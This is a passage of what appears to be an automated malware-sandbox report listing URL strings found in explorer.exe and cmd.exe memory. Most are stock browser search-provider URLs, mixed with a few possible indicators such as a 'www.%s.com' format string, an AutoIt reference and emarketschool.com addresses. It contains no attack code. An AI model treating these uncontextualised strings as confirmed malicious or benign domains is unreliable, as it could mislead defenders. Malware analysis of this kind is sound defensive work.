          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1296158118.0000000007EC1000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.2
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000002.00000000.1290179467.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000002.00000000.1301727071.000000000CF80000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: cmd.exe, 00000006.00000002.1547088854.0000000003C39000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com/default.php
